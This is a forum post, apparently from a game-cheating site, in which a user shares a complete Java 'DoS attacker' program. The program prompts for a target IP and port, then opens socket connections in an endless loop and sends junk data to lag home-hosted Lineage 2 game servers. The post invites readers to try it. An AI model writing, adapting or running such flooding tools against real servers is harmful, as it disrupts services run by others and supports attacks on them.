Jump to content

[Share]Newbie Java Dos Attacker


Coolis®

Recommended Posts

Just One NewBie java dos attacker... it cant destroy any "l2 server" but if "l2 server" have got homemaded "server" it can litle lag it ;)

package doscript;

import java.util.Scanner;
import java.io.*;
import java.net.*;
public class Main {
   public static void main(String[] args) throws IOException {
        Scanner x = new Scanner(System.in);
        String A;
        int B;
        System.out.println("+-----------------------------------------------+");
        System.out.println("+---       Coolis Java Dos Attacker   ---+");
        System.out.println("+-----            MaxCheaterS.com            ----+");
        System.out.println("+-----------------------------------------------+");
        System.out.print("Enter target IP:");
        A = x.next();
        System.out.print("\nEnter target port:");
        B = x.nextInt();
        while (1==1) {
        Socket sock = new Socket(A, B);
        BufferedReader in = new BufferedReader(new InputStreamReader(sock.getInputStream()));
        PrintWriter out = new PrintWriter(sock.getOutputStream(), true);
        System.out.print("*");
        out.print("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA​AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
        in.close();
     }
}
}

 

Just test it... (if you try to dedicated it will have no effect... Only for home pc...)

Link to comment
Share on other sites

  • 2 months later...
  • 3 months later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock